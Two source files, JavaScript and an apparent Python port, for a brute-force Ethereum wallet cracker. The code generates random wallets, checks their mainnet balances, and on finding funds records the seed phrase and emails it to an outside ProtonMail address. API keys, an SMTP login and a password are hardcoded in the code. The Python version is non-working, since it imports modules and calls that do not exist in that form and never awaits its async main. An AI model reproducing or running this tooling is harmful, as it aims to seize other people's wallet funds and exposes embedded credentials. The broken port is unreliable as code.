File: eth-asshole.js
const ethers = require('ethers');
const nodemailer = require('nodemailer');
const fs = require('fs/promises');

const API_KEY = 'https://eth-mainnet.g.alchemy.com/v2/JCNCAmqFfaWQ9WQrW143reOVrnRg1YfY';
const provider = new ethers.providers.JsonRpcProvider(API_KEY);

async function sendEmail(wallet) {
  const transporter = nodemailer.createTransport({
    host: 'smtp.protonmail.com',
    port: 587,
    secure: false,
    auth: {
      user: 'ethsender@protonmail.com',
      pass: 'LubieChuje2137',
    },
  });

  const mailOptions = {
    from: 'ethsender@protonmail.com',
    to: 'crackedeth@proton.me',
    subject: 'New Ethereum wallet found!',
    text: `Address: ${wallet.address}\nMnemonic: ${wallet.mnemonic.phrase}`,
  };

  await transporter.sendMail(mailOptions);
  console.log('Email sent!');
}

async function main() {
  while (1) {
    const wallet = ethers.Wallet.createRandom();
    const mnemonic = wallet.mnemonic.phrase;
    const address = wallet.address;
    const balance = ethers.utils.formatEther(await provider.getBalance(wallet.address));
    console.log(`Balance: ${balance}`);

    if (balance !== '0.0') {
      let crackedData;

      try {
        const data = await fs.readFile('./cracked.json');
        crackedData = JSON.parse(data);
      } catch (err) {
        console.error(err);
        continue;
      }

      crackedData[address] = { mnemonic, balance };

      try {
        await fs.writeFile('./cracked.json', JSON.stringify(crackedData, null, 4), 'utf8');
        await sendEmail(wallet);
      } catch (err) {
        console.error(err);
        continue;
      }
    }
  }
}

main();

File: eth-asshole.py
import ethers
import nodemailer
import json

from ethers import providers, utils
from nodemailer import SMTP
from ethers.wallet import Wallet

API_KEY = "https://mainnet.infura.io/v3/267cf8a4393e43739b3dbace75de0030"
provider = providers.JsonRpcProvider(API_KEY)

async def send_email(wallet):
    with SMTP(host='smtp.protonmail.com', port=587) as transporter:
        transporter.starttls()
        transporter.login("ethsender@protonmail.com", "LubieChuje2137")

        mail_options = {
            'from': 'ethsender@protonmail.com',
            'to': 'crackedeth@proton.me',
            'subject': 'New Ethereum wallet found!',
            'text': f"Address: {wallet.address}\nMnemonic: {wallet.mnemonic.phrase}"
        }

        transporter.send_message(mail_options)

    print('Email sent!')

async def main():
    while True:
        wallet = Wallet.create_random()
        mnemonic = wallet.mnemonic.phrase
        address = wallet.address
        balance = utils.format_ether(await provider.get_balance(wallet.address))
        print(f"Balance: {balance}")

        if balance != '0.0':
            try:
                with open('cracked.json', 'r') as file:
                    cracked_data = json.load(file)
            except FileNotFoundError as err:
                print(err)
                continue

            cracked_data[address] = {'mnemonic': mnemonic, 'balance': balance}

            try:
                with open('cracked.json', 'w') as file:
                    json.dump(cracked_data, file, indent=4)
                await send_email(wallet)
            except IOError as err:
                print(err)
                continue

if __name__ == '__main__':
    main()
